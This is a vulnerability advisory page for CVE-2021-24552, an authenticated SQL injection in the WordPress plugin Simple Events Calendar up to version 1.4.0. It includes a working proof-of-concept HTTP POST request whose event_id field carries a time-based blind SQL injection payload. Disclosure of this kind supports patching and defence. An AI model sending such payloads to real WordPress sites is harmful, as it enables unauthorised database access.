Lucene search
WpvulndbWPEX-ID:3482A015-A5ED-4913-B516-9EAE2B3F89DBHistoryJul 24, 2021 - 12:00 a.m.
Simple Events Calendar <= 1.4.0 - Authenticated (admin+) SQL Injection
2021-07-2400:00:00
wpvulndb
85
0.001 Low
EPSS
Percentile
45.2%
The plugin does not sanitise, validate or escape the event_id POST parameter before using it in a SQL statement when deleting events, leading to an authenticated SQL injection issue
POST /wp-admin/admin.php?page=simple-events&tab=existing_events HTTP/1.1
Content-Length: 33
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close
event_id=1%20AND%20(SELECT%204695%20FROM%20(SELECT(SLEEP(5)))wWPs)&delete=RemoveRelated
wpvulndb
wpvulndb
Simple Events Calendar <= 1.4.0 - Authenticated (admin+) SQL Injection
2021-07-24 00:00:00
patchstack
patchstack
cvelist
cvelist
nvd
nvd
CVE-2021-24552
2021-08-23 12:15:09
cve
cve
CVE-2021-24552
2021-08-23 12:15:09
prion
prion
Sql injection
2021-08-23 12:15:00